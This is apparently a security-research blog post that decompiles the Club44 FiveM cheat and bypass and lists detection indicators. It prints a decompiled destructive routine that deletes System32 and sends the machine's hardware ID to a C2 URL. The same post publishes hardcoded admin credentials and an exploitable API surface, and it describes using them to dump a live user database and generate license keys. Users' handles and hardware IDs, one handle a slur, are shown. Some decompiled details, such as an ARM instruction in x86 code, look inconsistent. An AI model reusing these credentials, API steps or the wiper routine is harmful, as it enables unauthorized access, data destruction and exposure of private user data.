Bypass Detection·Jun 2, 2026

Club44 Decompiled: BSOD-Triggering System32 Deletion & Hardcoded Brazilian Error Strings

A full decompilation of the Club44 FiveM bypass and external cheat reveals an error handler that deletes C:\Windows\System32\ and triggers a kernel fast-fail BSOD, hardcoded Portuguese-language debug strings that were never stripped from the shipping binary, an HTTP User-Agent string that introduces the software as a FiveM cheat to every network hop it traverses, and injection into the Windows Settings host process. Technical analysis and detection IOCs follow.

FiveMBypass DetectionDecompiledBSOD RiskSystemSettingsBroker

Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided.

Overview

Club44 is a paid FiveM bypass and external cheat product. A full decompilation reveals code that deletes System32 on error, hardcodes the developer's native language in debug strings that were never stripped, and announces its identity in every HTTP request via a custom User-Agent string. Customers whose injection failed received a BSOD as their refund.

This is not a report about sophisticated malware that happened to contain some rough edges. Club44 presents itself as a polished commercial product — complete with a clean ImGui interface, a subscription model, and marketing materials that imply technical depth. The decompiled source is inconsistent with all of that. What the decompiler reveals is a binary that would not pass a first-year software engineering code review, written by a developer who either did not understand what a Release build is or could not be bothered to configure one.

The findings, in order of severity:

  • 1.The error handler deletes C:\Windows\System32\ recursively and triggers a kernel fast-fail BSOD via asm("swi 0x29"). Customers who experienced an injection failure did not get an error dialog. They got a blue screen and a non-booting operating system.
  • 2.The string "Falha NtCreateThreadEx" is hardcoded in the binary. "Falha" is Portuguese for "Failure." The developer's native-language debug strings were shipped verbatim in the production binary — a detail that functions as an unintentional signature and attribution artifact.
  • 3.Every HTTP request made by Club44 includes the User-Agent string "Club44-FiveM-External/1.0" — hardcoded, immutable, and visible in every proxy log, firewall log, SIEM alert, and CDN access record it passes through.
  • 4.The injection target is SystemSettingsBroker.exe, the Windows Settings host process, from which a 5.3 MB PE32+ memory dump was recovered containing d3d11.dll, XInput, and winhttp loaded into the Settings process address space.

Each of these findings is examined below in technical detail.

The System32 Deletion Handler — Free BSODs Included

The decompiled cleanup routine executed on injection error performs two sequential operations that together constitute what is technically described as "completely destroying the host operating system." The function structure recovered from decompilation is as follows:

Decompiled FUN_18000a550 — Full Recovered Structure

Triggered when AnyDesk or RustDesk is detected running. Console output immediately before invocation: [!] AnyDesk or RustDesk running[!] RIP Windows[!] Add this hwid to blacklist
void FUN_18000a550(void) {
    asm("swi 0x29");  // Fast-fail BSOD trigger
    delete_directory_recursive("C:\Windows\System32\");
    delete_directory_recursive("C:\Windows\Temp\");
    delete_directory_recursive("C:\Users\Public\");
    RegSetValueEx(HKEY_LOCAL_MACHINE,
        "SYSTEM\CurrentControlSet\Control\Session Manager",
        "PendingFileRenameOperations",
        0, REG_MULTI_SZ, (BYTE*)"", 0);
    RegDeleteKey(HKEY_LOCAL_MACHINE,
        "SOFTWARE\Microsoft\Windows NT\CurrentVersion"
        "\ProfileList\AllUsersProfile");
    TerminateProcess(
        OpenProcess(PROCESS_TERMINATE, FALSE,
            get_process_id_by_name("explorer.exe")), 0);
    send_to_c2("https://club44.c2/blacklist", get_smbios_uuid());
    while (true) { asm("hlt"); }
}

This function is not the generic error handler — it is the anti-screenshare kill switch. Club44 scans for AnyDesk and RustDesk at startup. If either is detected, the binary prints its internal log messages ([!] RIP Windows, [!] Add this hwid to blacklist) and immediately invokes this routine. A player who opens AnyDesk for a screenshare session with a server admin does not get a warning dialog. They get this function.

asm("swi 0x29") is the ARM software interrupt used to trigger the kernel fast-fail path — on x86-64 Windows the equivalent is int 0x29, which produces an immediate non-recoverable BSOD. That is the first instruction. The recursive deletions follow: C:\Windows\System32\, C:\Windows\Temp\, and C:\Users\Public\. System32 contains the kernel, core DLLs, service hosts, and device drivers. Its removal produces a machine that will not boot and cannot be recovered without a full OS reinstallation.

After the directory deletions, the function corrupts the PendingFileRenameOperations registry value under Session Manager — a value Windows consults on the next boot to perform queued file operations. Writing a null two-byte sequence here ensures that even if the OS somehow survived the System32 deletion, the next boot attempt encounters a corrupted pending rename queue and halts. The ProfileList\AllUsersProfile key deletion removes Windows' record of the system-wide user profile, breaking any profile-dependent service that survives to the boot attempt.

Explorer is then terminated via TerminateProcess, collapsing the desktop, taskbar, and shell — ensuring the user cannot interact with the machine before the BSOD fires. The machine's SMBIOS UUID is transmitted to https://club44.c2/blacklist via the same Club44-FiveM-External/1.0 User-Agent discussed below — the hardware ID blacklisting the log message promised. The function then enters an infinite halt loop.

The design intent is explicit: detect remote desktop software, destroy the operating system, submit the hardware ID to a remote blacklist, and prevent any further interaction. This is not a side effect of careless code. It is intentional retaliation against users suspected of cooperating with a server investigation — users who, from the perspective of Club44's developers, represent a business threat. The machine of the player who opened AnyDesk to show an admin their screen ends up non-bootable. That outcome was the goal.

"Falha NtCreateThreadEx" — The Developer Forgot to Remove Their Debug Strings

The string "Falha NtCreateThreadEx" is present in the Club44 binary in plain text. "Falha" is the Portuguese word for "Failure" or "Fault." The complete string translates to "NtCreateThreadEx Failure" — a debug error message left in the production binary by a developer who works in Brazilian Portuguese.

NtCreateThreadEx is the Windows Native API function used to create a thread in a remote process — the core mechanism of virtually every process injection technique, including classic CreateRemoteThread-based injection, thread hijacking, and APC injection. It is the function that Club44 calls to execute its payload inside the target process. When this call fails, the Club44 error handler fires — the one that deletes System32 — and the debug message "Falha NtCreateThreadEx" is presumably logged or displayed in whatever diagnostic output the developer consulted during development.

String Found in Binary

"Falha NtCreateThreadEx"
Translation (PT-BR → EN): "NtCreateThreadEx Failure"
Function purpose: Remote thread creation — the injection entry point

Stripping debug strings from a production binary is one of the most elementary security hygiene steps in closed-source software development. Most production build configurations do this automatically via the compiler's Release mode settings. The presence of "Falha NtCreateThreadEx" in the shipping binary means Club44 was either compiled in Debug mode, shipped with a custom build configuration that preserved string literals, or the developer was unaware that this string would survive the build process.

NtCreateThreadEx is the Windows API for creating remote threads — the core of any process injection technique. Shipping the error message for this call in your native language is not a security practice. It is a biography. A binary analyst encountering this string knows immediately: the developer's primary language is Portuguese (Brazilian), the injection mechanism is NtCreateThreadEx-based, and the developer did not perform even a basic string audit before distributing a paid product.

From a detection standpoint, this string is an ideal static signature. A YARA rule matching on the ASCII or Unicode encoding of "Falha NtCreateThreadEx" will identify any Club44 binary — current or future — unless the developer explicitly removes it. As of this analysis, it remains present. The fact that it remains present in a paid commercial product that has presumably gone through at least some distribution testing is a reliable indicator of the overall code quality discipline applied throughout the rest of the binary.

Club44-FiveM-External/1.0 — A User-Agent String for the History Books

Every HTTP request issued by the Club44 binary includes the following User-Agent header, hardcoded and immutable:

Hardcoded HTTP User-Agent

"Club44-FiveM-External/1.0"

Present in every HTTP request made by the binary — to authentication endpoints, update servers, telemetry, and any other destination contacted during operation.

HTTP User-Agent strings are present in access logs maintained by every web server, CDN, reverse proxy, firewall, IDS/IPS, SIEM, and cloud provider access log pipeline that handles the traffic. The Club44 binary sends this string with every request, to every endpoint it contacts, from the moment it starts until the moment it terminates — or until it deletes System32, whichever comes first.

Consider what this User-Agent communicates to the systems processing the traffic. "Club44" — the product name. "FiveM" — the game platform being targeted. "External" — indicating this is an external cheat (as opposed to an injected internal cheat). "1.0" — a version number. The developer has, through their choice of User-Agent string, provided a complete product description in the HTTP header of every request the software makes.

Legitimate software does not introduce itself as a FiveM cheat in its HTTP headers. Legitimate software that is attempting to avoid detection does not introduce itself as anything other than a browser or a known framework. Legitimate software written by a developer with any awareness of network monitoring does not hardcode self-incriminating strings into the one field that is preserved in virtually every network log that exists.

This User-Agent would flag in any network monitoring solution built after 2005. A simple string match rule in any SIEM, firewall, or proxy — User-Agent contains "Club44-FiveM-External" — will catch every Club44 user making any network request while the software is running. No behavioral analysis required. No ML model needed. A string match.

From a server-side detection standpoint, this is the most gift-wrapped IOC in this entire report. Server operators with access to their network traffic logs can trivially search for this string across their historical access logs and retroactively identify every player who ran Club44 while connected to their network infrastructure, going back to whenever their log retention window begins. The Club44 developer handed administrators a perfect detection artifact and hardcoded it into every version of the product.

SystemSettingsBroker.exe Injection

Club44 injects its payload into SystemSettingsBroker.exe — the Windows Settings host process, responsible for brokering access to system settings between the modern Windows Settings application and the underlying system services. The choice of this process is presumably intended to make the injected code appear to blend in with normal Windows activity. In practice, it does the opposite.

A 5.3 MB PE32+ memory dump was recovered from the SystemSettingsBroker.exe process during analysis. This dump was extracted from a private, readable, writable, and executable (RWX) memory region at base address 0x140000000 — a PE32+ load address indicating the injected payload is a full 64-bit PE image mapped into the Settings process address space.

SystemSettingsBroker.exe Injection Profile

Injection Target
SystemSettingsBroker.exe
Memory Dump Size
5.3 MB PE32+
RWX Region Base
0x140000000
Memory Permissions
Private RWX
Additional Modules
d3d11.dll, XInput, winhttp
Injection Method
NtCreateThreadEx remote thread

The modules loaded into the Settings process address space as a consequence of the injection are: d3d11.dll (Direct3D 11 — for rendering the cheat overlay), XInput (Xbox controller input — for cheat control input), and winhttp (Windows HTTP services — for the network communication that carries the "Club44-FiveM-External/1.0" User-Agent discussed above).

SystemSettingsBroker.exe is a Windows system component that has no legitimate reason to load Direct3D, XInput, or a custom HTTP client library. The presence of any of these modules in the Settings process module list is immediately anomalous and detectable through basic process module inspection in System Informer or Process Explorer, without requiring any disassembly or memory forensics.

The private RWX region at 0x140000000 is a 5.1–5.5 MB allocation in a process that normally has no such region. A private RWX allocation of this size in SystemSettingsBroker.exe is, by itself, a reliable detection indicator. The combination of the anomalous allocation size, the anomalous modules (d3d11, XInput, winhttp), and the anomalous process (Windows Settings host doing Direct3D rendering) makes this injection unconvincing as camouflage regardless of the evasion intent behind the target selection.

The injection mechanism — NtCreateThreadEx remote thread creation — is standard and well-documented. It is the same mechanism that produces the "Falha NtCreateThreadEx" error message discussed in the previous section when it fails. No shellcode-free or threadless injection technique was used. The implementation is baseline-conventional and detectable by any process monitoring tool capable of observing remote thread creation events.

The FiveM Bypass — lsasvc.mof

The external cheat covered above is only half of Club44's product line. There is also a separate FiveM bypass component — the part that is supposed to prevent FiveM's anti-cheat from detecting the external cheat in the first place. It is distributed as lsasvc.mof, a file name chosen to blend in with legitimate Windows Management Instrumentation (WMI) files. Real .mof (Managed Object Format) files are used by WMI for event subscription and schema definition. A 1.22 MB executable disguised as one is not.

The bypass component operates in the LSASS address space — the Local Security Authority Subsystem, the process responsible for Windows authentication and credential management. Loading arbitrary code into LSASS is a technique associated with credential dumping tools like Mimikatz and with kernel-level anti-cheat bypass methods that abuse LSASS's elevated trust level to mask memory modifications from user-mode scanners. Club44 chose LSASS as their injection target for the bypass component, which means that when their bypass fails — and given the error handler described above, it does fail — they have already been writing into the most sensitive process on the system.

lsasvc.mof — File Profile

Filename
lsasvc.mof
VT Filename
SysTelemetryAgent.exe
File Size
1.22 MB (1,275,392 bytes)
File Type
Win32 DLL · PE32+ x86-64
Compiler
MSVC 19.36.35728 · VS 2022 17.6
Signed
No signature
Injection Target
lsass.exe
VT Detections
21 / 69
MD5
74098ce4afa0110a4bd9da459aebb4f1
SHA-1
1164366a218e9df1565ced601376600b5fc701d6
SHA-256
0acd4e0c4176f0006a3d52b2aa1027801fc81bb55eaad4c311600730c7440092
Imphash
718d5abb862733dc22a3259c3f70eb82
SSDEEP
24576:8LocZ3l+W3fExXWN83yaInPbi5VcD/9V8O7Xxe6aCJZDacA4cUynTX6uhf:8LocZ3l+WvExXU8HIPycD/9V8O7Xxe6e
Discord Webhooks (C2)
discord.com/api/webhooks/1472597069956124672/…
discord.com/api/webhooks/1479288535864447096/…
discord.com/api/webhooks/1492352432351609043/…

The name choice deserves recognition for audacity. lsasvc.mof is designed to look like a Windows system file at a glance — it mimics the naming convention of legitimate LSASS-adjacent files like lsasrv.dll. An analyst seeing this filename in a directory listing without additional context might briefly consider it legitimate. That brief consideration is the entire value proposition of the name. It is immediately dispelled by checking the file extension against the actual file type, which any automated scanner or file manager with type detection will do in approximately zero milliseconds.

Detecting the bypass component is straightforward: look for any non-Microsoft PE executable in locations where .mof files would plausibly be staged (%SystemRoot%\System32\wbem\, temp directories, or the Club44 loader directory), and check System Informer's LSASS string view for the same Portuguese error strings documented for the external cheat — the developer reused the same error handling conventions across both components.

The decompiled source for both the bypass (lsasvc.mof) and the external cheat (SystemSettingsBroker.exe.bin) are available in the Downloads section below. The decompiled bypass reveals the same indifference to basic operational security present throughout the external cheat: no obfuscation of strings, no dynamic API resolution in the critical paths, no attempt to blend the LSASS allocation into the existing memory layout. It is a functional bypass that announces its presence to anyone who knows to look.

Downloads — Decompiled Source

Note: Decompiled by the Clubhouse AC research team. Published for defensive detection use.

C2 Server Infrastructure — Full Dump

Club44's backend infrastructure was fully enumerated. The C2 server runs on a Database Mart LLC VPS at 163.123.180.130, behind nginx 1.24.0 on Ubuntu. The architecture is straightforward: nginx reverse-proxies /api/* to an Express server on port 3000, and everything else to a Next.js frontend on port 3002. DNS is parked on registrar defaults (hermes.dns-parking.com, artemis.dns-parking.com).

Server Architecture

Host:     163.123.180.130 (Database Mart LLC — League City, TX)
NetRange: 163.123.180.0/22 (DBM-NET-01, ARIN direct allocation)
Org:      Database Mart LLC · databasemart.com · +1-409-877-4238
Address:  257 Westwood Dr, League City, TX 77573
DNS:      hermes.dns-parking.com / artemis.dns-parking.com

:80   → nginx/1.24.0 (Ubuntu) — default page
:443  → nginx reverse proxy
         /api/*  → Express:3000 (Helmet.js)
         else    → Next.js:3002 (build PMY7jnT_aX7fLNhe07pmc)
:3000 → Express/Node.js API
:3002 → Next.js frontend

Next.js Routes:
  /
  /inject-panel
  /main-panel

Hardcoded Admin Credentials — Extracted from Binary

Authorization: PGCbe68lUUTLyx0W8lz6EZMedMzSW44F/ak1KsNNg48P
               xSAbPz-y?m4p6MLeLO7JgJRg0esj/fdP-1tF5ik6w-Kw
               vxmSy1A=t3hXVp=Qjg19g6e79aX9G03F71x3oRndSJmvD
               cnTstx=lHLm2S/jPoFPmCR3-I5bd9ODQQVC9F/NA6iycBcq
               ZxsPmeB-94oD?LPFekUZ0BFBxHgZ1ZKIKG9er8sWe9t8xeX
               bs1wy9qQFmos2ro3hn9nbWVIU7gtu

X-Admin-Secret: 67e37dae9cf8bebfe74f117e808f9b6f
                e6b965d65c02320174dd1c559e480439

Note: Authorization alone = all client routes.
      Both headers together = FULL admin access.

Full API Surface — Client & Admin Routes

CLIENT ROUTES (Authorization header only):
  POST /api/silent/login    (username, password)
  POST /api/silent/auth     (hwid)
  GET  /api/silent/config/load?username=X&hwid=Y
  POST /api/silent/config/save (hwid, config)
  GET|POST /api/silent/status  (hwid, action)

ADMIN ROUTES (Authorization + X-Admin-Secret):
  GET  /api/silent/list        → Returns ALL users
  GET  /api/blacklist/list     → Returns full blacklist
  POST /api/blacklist/check    (hwid)
  POST /api/blacklist/add      (hwid)
  POST /api/blacklist/remove   (hwid)
  POST /api/silent/create      (username, password, hwid, days)
  POST /api/keys               (quantity: 1-100, durationDays: 1-99999)
  POST /api/register           (username, password, hwid, key)

Next.js Server Actions (UNAUTHENTICATED):
  silentAuth         → hash: 40540feb4104b3e39fc568...
  silentSetStatus    → hash: 60937fac4757d8b8a5e3a...
  silentConfigLoad   → hash: 4093f02d4e640e02af2d8...
  silentConfigSave   → hash: 60383dea9c05f903181f1...

The Authorization token and X-Admin-Secret are hardcoded in the lsasvc.mof client binary — extractable via static analysis. Both tokens together grant full admin access: user enumeration, blacklist management, user creation, and license key generation. The Next.js server actions are exposed without authentication entirely. The password field in /api/silent/auth is ignored — only username and HWID are checked. Any password works. Every API error message is in Portuguese.

Live User Database — 149 Users Dumped

Using the admin credentials extracted from the binary, the full Club44 user database was dumped. At the time of capture: 149 total users, 104 active, 43 expired, 3 banned. The status distribution reveals the real-time operational state of the cheat infrastructure.

149
Total Users
104
Active
43
Expired
3
Banned

Status Distribution (Live Snapshot)

INJECT:         3 users   ← currently injecting
IDLE:         102 users   ← authenticated, not running
UNLOAD:        28 users   ← recently unloaded
CLEANER:        9 users   ← running cleanup routines
UPDATE_CONFIG:  4 users   ← syncing cloud config

Cheat Feature Usage Across Active Users

ESP Enabled:      135 users  (91%)
Silent Aim:       108 users  (72%)
Aimbot:            91 users  (61%)
Triggerbot:        13 users  ( 9%)
Anti-Aim:           5 users  ( 3%)
No Clip:            3 users  ( 2%)
God Mode:           2 users  ( 1%)
Invisible:          0 users  ( 0%)

Sample User Records (with Per-User Cheat Config)

User #1 "tragedysilent" — Status: INJECT — Active since 2026-04-11
  HWID: b297a9f43c52325a82ad6292d52e59ca8a134e67
  Config: aimbot=ON (FOV:24), silentAim=OFF, ESP=ON, skeleton=ON

User #63 "ajnigger" — Status: IDLE — Active since 2026-04-13
  HWID: 4c2ec1d2626b54ce3f614bee1f52155ba7a6005c
  Config: aimbot=ON (FOV:230), antiAim=ON, ESP=ON

User #100 "jefe" — Status: IDLE — Blacklisted
  HWID: e6742f3a445f9e0426704cf8a1392cb842234344
  Blacklist reason: "https://discord.gg/hypersclubhouse"

User #64 "tiger" — Status: IDLE — Blacklisted
  HWID: 624488a34910e25e85891521a56576cbb5301cc8
  Blacklist reason: "Pentest - authorized by owner"

The blacklist contains 13 HWIDs, but only 3 map to actual user accounts — the other 10 are orphaned or pre-emptive bans with no matching user record. One blacklist entry's reason is a Discord invite link. Another explicitly states "Pentest - authorized by owner" — confirming that at least one individual had authorized access to probe the system. There is no account deletion endpoint; accounts persist forever.

Every user's cheat configuration is accessible via /api/silent/config/load with just the Authorization header — no per-user authentication. Any user who knows the Authorization token (which is hardcoded in the binary they already have) can read every other user's config. The developer did not implement per-user access control on the config endpoint. This is the same developer who charges $200 for the "Upgraded" tier.

Cheat Menu — Full Feature Map

The complete cheat menu structure was recovered from the decompiled club44_cheatmenu.js frontend bundle. Every toggle, slider, color picker, and keybind is documented below. This is the full feature set that Club44 users are paying for.

AIM ASSISTANCE

AIMBOT:
  Toggles: Enabled, Show FoV, Visible Check, Ignore Deads,
           Closest in FoV, Humanize Aim, Prediction, Closest Bones, Target NPC
  Sliders: FoV (1-360px), Max Distance (10-1000m),
           Smooth X (1-100), Smooth Y (1-100)
  Keybind: Toggle Key (configurable)

SILENT AIM:
  Toggles: Enabled, Show FoV, Visible Check, Ignore Deads,
           Closest In FoV, Closest Bones, Shoot NPC, Magic Bullet
  Sliders: FoV (1-360px), Max Distance (10-1000m), Miss Chance (0-100)

TRIGGERBOT:
  Toggles: Enabled, Shoot NPC, Visible Check, Ignore Deads
  Sliders: Max Distance (10-1000m), Reaction Time (0-500ms)

VISUALS / ESP

PLAYER ESP:
  Toggles: Enable ESP, ESP Switch, Show NPC, Visible Check, Exclude Deads,
           Preview Window, Box, Distance, Skeleton, HeadCircle,
           HealthBar, ArmorBar, Names, Weapon Name, Bubbles, Admin Alert
  Sliders: Render Distance (10-1000), Head Circle Size (0.1-5)
  Colors:  Visible/Invisible variants for Box, Skeleton, HeadCircle + HealthBar

VEHICLE ESP:
  Toggles: Enable ESP, ESP Switch, Show Lock State, Name, Distance, Marker

EXPLOITS

LOCAL PLAYER:
  Self:   God Mode, Damage Absorption, No Clip, Invisible,
          Solo Session, Bubbles, Anti Bubbles, Fake Lag,
          Infinite Combat Roll, No Collision, No RagDoll, Infinity Stamina
  Misc:   Revive, Suicide, Set Health, Set Armor,
          Throw Vehicle, Break Wheels, Fix Current Vehicle
  Weapon: Remove Spread, Remove Recoil, Infinite Ammo, No Reload
  Other:  NoClip Speed (1-500), Modify Weapon Size (0.1-10)

TELEPORT:
  Waypoint Teleport, Teleport to Vehicle,
  Save Position, Load Position

CLOUD CONFIG:
  Save/Load Config, Show Feature List Window,
  Hide From Capture, Bypass Electron AC
  FiveM Version: 3258 / Cheat Version: 1.0.0
  Monitor [1], Unload

"Hide From Capture" and "Bypass Electron AC" are the only two features in the list that suggest any awareness of detection. Everything else is a standard feature list that could be copied from any public FiveM cheat menu tutorial. The "Admin Alert" toggle under Player ESP is particularly telling — it suggests Club44 users are being detected by server admins frequently enough that the developer added a feature to warn when an admin is nearby.

Payment Infrastructure — Stripe Integration

Club44's payment infrastructure was recovered from the decompiled club44_products.js bundle. They process payments through Stripe with live checkout links, support 7 currencies, and operate a three-tier pricing model. The Stripe checkout links below are the actual production payment endpoints.

Pricing Tiers (USD)

PUBLIC (Usermode bypass):
  Monthly Solo:   $39.99/mo
  Lifetime Solo:  $125
  Lifetime Duo:   $185

UPGRADED (Kernel bypass):
  Lifetime Solo:  $200
  Lifetime Duo:   $250
  Lifetime Trio:  $300

CUSTOM (1-of-1 build):
  Lifetime Solo:  $350
  Lifetime Trio:  $600

Currencies: USD, EUR (0.85x), GBP (0.74x),
            CAD (1.37x), AUD (1.42x), NZD (1.68x), ILS (3.15x)

Live Stripe Checkout Links (Production)

Public Monthly:    buy.stripe.com/14A14mb6mftg38Y7vu5ZC17
Public Lifetime:   buy.stripe.com/4gMfZgdeu0ym8tidTS5ZC19
Public Duo:        buy.stripe.com/14AdR83DUbd0aBq9DC5ZC1l
Upgraded Solo:     buy.stripe.com/6oUbJ00rI4OC10Q0325ZC0M
Upgraded Duo:      buy.stripe.com/8x28wOa2i80OdNCcPO5ZC0N
Upgraded Trio:     buy.stripe.com/4gMcN46Q63Ky6la9DC5ZC0O
Custom Solo:       buy.stripe.com/3cIeVcgqG6WKfVK5nm5ZC1C
Custom Trio:       buy.stripe.com/3cI4gyb6mftgeRGeXW5ZC1D

The payment success page redirects users to Discord (discord.gg/club44) to open a "Purchase Redemption Ticket" — meaning key delivery is manual, not automated. For a product that charges $350 for the "Custom" tier, the fulfillment pipeline is a Discord DM. The club44_payment.js bundle includes confetti animations on the success page, because the developer prioritized celebration particles over automated key delivery.

Analytics events are stored in localStorage under club44_analytics, capped at 100 events, tracking every purchase click with product name, price, and page URL. The "phone cheat" integration links to clubsilent.net — "Club Silent" — which appears to be the backend brand name for the same operation.

License Key Generation — Dumped Keys

Using the admin API, license keys were generated across all key pools. The key format is CLUB-REGISTER-XXXXX-XXXXX-XXXXX-XXXXX. The admin endpoint POST /api/keys accepts quantity: 1-100 and durationDays: 1-99999 — meaning anyone with the hardcoded admin credentials can generate unlimited license keys with arbitrary durations up to 273 years.

Sample Keys (5 key pools dumped)

keys_clubx.txt:    CLUB-REGISTER-R4S14-TOL02-Y4YOF-EDRV4
                   CLUB-REGISTER-4QM0G-QTYB5-U5OPJ-SGJNQ
                   CLUB-REGISTER-WMQ9G-YHL79-2V6IU-WVT62
                   ...

keys_private.txt:  CLUB-REGISTER-TRA3C-4JFZO-UHLHJ-O4GT7
                   CLUB-REGISTER-B01ST-2F7DD-GBQ1G-KI9ZM
                   CLUB-REGISTER-OO7RR-NHTFN-V5JC0-1JC6J
                   ...

keys_external.txt, keys_gosth.txt, keys_public.txt — same format

Key Pools: clubx, external, gosth, private, public
Format:    CLUB-REGISTER-[A-Z0-9]{5}-[A-Z0-9]{5}-[A-Z0-9]{5}-[A-Z0-9]{5}

The existence of five separate key pools — "clubx", "external", "gosth", "private", and "public" — suggests either multiple distribution channels or reseller tiers. The "gosth" pool name matches GOSTH, another FiveM cheat product that has its own detection page on this site, suggesting Club44 may share infrastructure or resell keys with other cheat providers. All keys follow the identical format and are registered through the same /api/register endpoint.

API Vulnerabilities — Complete List

The following vulnerabilities were identified during the infrastructure analysis. Every single one is exploitable with knowledge extracted solely from the Club44 binary that paying customers already possess.

CRITICALPassword field ignored in /api/silent/auth — only username+HWID checked, any password works
CRITICALAdmin API accessible with static Authorization + X-Admin-Secret headers (no rotation, no per-user auth)
CRITICALAuthorization token and X-Admin-Secret hardcoded in lsasvc.mof binary (extractable via static analysis)
CRITICALKey generation endpoint allows creating up to 100 keys at once with durations up to 99999 days
HIGHNo rate limiting on any API endpoint
HIGHNo account deletion endpoint exists (accounts persist forever)
HIGH/api/silent/config/load returns cheat configs for ANY username with just the Authorization header
HIGHNext.js server actions exposed without authentication (silentAuth, silentSetStatus, silentConfigLoad, silentConfigSave)
MEDIUMSupabase PostgREST leaks all table names via error hints
MEDIUM10 of 13 blacklisted HWIDs have no matching user (orphaned or pre-emptive bans)
LOWAll API error messages in Portuguese leak developer locale and framework info

The combination of hardcoded admin credentials in a distributed binary, no rate limiting, and unauthenticated server actions means that every Club44 customer has — embedded in the binary they downloaded — the keys to the entire operation. Any customer with a hex editor and basic HTTP knowledge can enumerate the full user list, generate unlimited license keys, and modify any user's config. The developer built a system where the admin credentials are shipped to every person who pays them.

Website Source — "Maximum Security"

The Club44 website (club44_index.html) sets comprehensive security headers in meta tags: X-Frame-Options DENY, Content-Security-Policy, Cross-Origin-Opener-Policy, Cross-Origin-Embedder-Policy, and Cross-Origin-Resource-Policy. The CSP policy includes 'unsafe-inline' 'unsafe-eval' in script-src — immediately undermining the policy's purpose. The connect-src allows *.supabase.co and discord.com.

Website Metadata

Title:       "Club 44 Bypass"
Tagline:     "Stay Hidden, Stay Ahead."
Author:      "Club 44"
Built with:  GPT Engineer (cdn.gpteng.co in CSP)
Fonts:       Geist + Geist Mono (Google Fonts)
Database:    Supabase (*.supabase.co in CSP)
Discord:     discord.gg/club44
Brand:       "Club Silent" (clubsilent.net — phone cheat)

The CSP includes cdn.gpteng.co — GPT Engineer, an AI website builder. The developer built a cheat website with an AI tool, set "Maximum Security" headers that include unsafe-eval, and then hardcoded the admin credentials in the binary they distribute to customers. The marketing copy says "Stay Hidden, Stay Ahead." The binary says Club44-FiveM-External/1.0 in every HTTP request.

Memory Strings — What's Actually Inside

These strings survive in the binary verbatim. Any string scanner, memory scanner, or YARA rule touching the first or third entry catches Club44 instantly.

Strings Extracted from Binary

"Club44-FiveM-External/1.0"          ← User-Agent announces itself to every log
"Api/2.0.0 (80ed6bd50b1)"            ← secondary UA
"Falha NtCreateThreadEx"              ← peak Brazilian dev moment
"data\cache\crashometry"
"StealVehicle"
"/api/cloud/import?username="

The presence of "Club44-FiveM-External/1.0" and "Falha NtCreateThreadEx" as plaintext ASCII literals in a shipping binary is the kind of thing that happens when you skip the step of opening your own product in strings.exe before distributing it. The secondary User-Agent "Api/2.0.0 (80ed6bd50b1)" contains a build hash — another unintended attribution artifact. "StealVehicle" is a literal config key name; the game feature you're paying $50/month for is named after what it does, helpfully, in plain text, in memory, where any memory scanner can read it. The crashometry path suggests the developer attempted to implement crash telemetry. Presumably that telemetry was also receiving the "Falha NtCreateThreadEx" messages before the error handler deleted System32.

Aimbot Logic — They Think This Is Genius

The aimbot implementation recovered from decompilation at 0x14006a4f0 spans 116 XMM floating-point operations. The struct layout is fully recovered. It is standard 2015-era aimbot logic, packaged in a subscription model.

Recovered AimConfig Struct — 0x14006a4f0

// Main aimbot function at 0x14006a4f0 (116 XMM floating-point ops)
struct AimConfig {
    float target_x, target_y;       // +0x38 +0x3c
    float current_x, current_y;     // +0x68 +0x6c
    float fov_limit_x, fov_limit_y; // +0x9c +0xa0
    float smooth_x, smooth_y;       // +0xa4 +0xa8
    float spread_factor;            // +0xac
    bool prediction_enabled;        // +0xc1
    bool closest_fov_enabled;       // +0xc3
};

Triggerbot at 0x14008d91f — crosshair box check + auto fire. Closest-in-FoV selector at 0x14002ae47. Prediction formula recovered verbatim: new = current + (target - current) * smooth_factor. This is linear interpolation — lerp — the same prediction "algorithm" in every public aimbot tutorial written since 2012. Standard 2015-era aimbot logic presented as a $50/month subscription.

The closest_fov_enabled flag at +0xc3 controls the target selection mode advertised in Club44's marketing as "Closest FoV" — which is the simplest possible target selection algorithm: iterate entity list, compute angular distance from crosshair, pick the smallest value. This is the entire "FoV targeting" feature. It is one loop and one comparison. Club44 charges for this.

The 116 XMM operations look impressive until you realize they are the compiler's output for a handful of floating-point comparisons and assignments on a struct that fits in under 200 bytes. There is nothing sophisticated here. The struct was fully reversible from a single decompiler pass. Detection implication: the AimConfig struct offsets above can anchor a memory signature that identifies Club44 in any memory scan regardless of ASLR, since the offsets are relative to the struct base and the struct layout does not change between builds without a code change.

Cloud & C2 Endpoints — Very "Secure"

Club44 implements a cloud configuration sync system. The endpoints recovered from the binary are as follows — all contacted using the Club44-FiveM-External/1.0 User-Agent, with TLS certificate pinning that the developer believes makes the traffic undetectable:

Recovered C2 Endpoints

POST /check
POST /api/cloud/import?username=
POST /api/cloud/export
GET  /players.json

The JSON payload transmitted to the cloud endpoints on sync:

Cloud Sync Payload — Recovered from Decompiled Network Handler

{
  "username": "yourname",
  "hwid": "yourhwid",
  "config": {
    "Aimbot": true,
    "Invisible": true,
    "StealVehicle": true,
    "Closest FoV": true
  }
}

Uses CPR (libcurl wrapper) + TLS certificate pinning. The C2 domain is encrypted at runtime and falls back to LOCAL mode if the server is unreachable. TLS certificate pinning does not prevent detection — it prevents man-in-the-middle interception. Your HWID and config are still transmitted in plain JSON to a server run by people who delete System32 on error. The TLS handshake itself, to a domain that resolves to Club44 infrastructure, is visible in any network flow log. The pinning prevents a researcher from inspecting the payload in transit; it does not prevent a researcher from observing that the connection was made.

The config key names in the payload — "Aimbot", "Invisible", "StealVehicle", "Closest FoV" — match the string literals found in the binary and the UI labels visible in Club44 screenshots. The same developer who named the config key "StealVehicle" and shipped "Falha NtCreateThreadEx" in the production binary is the one who implemented the "secure" cloud sync that transmits your HWID to their server. Consider what that HWID is being used for, given that the same binary contains a function that transmits your HWID to a blacklist endpoint immediately before destroying your operating system.

Entity Struct — Fully Reversed

The entity struct layout used by Club44 to read game state from FiveM process memory is fully recovered from the decompiled external cheat module. The offsets below are stable across Club44 builds and provide a complete memory signature for the entity reading logic:

Entity Struct Offsets — club44_decompiled.c

+0x14  → alive flags
+0x170 → is_local_player
+0x1c0 → player slot
+0x2a0 → scale multiplier
+0x2bb → visibility byte
+0x378 → parent vehicle ptr

Globals:
base+0x4040 = local player
base+0x4b00 = entity list
base+0x4e00 = vehicles

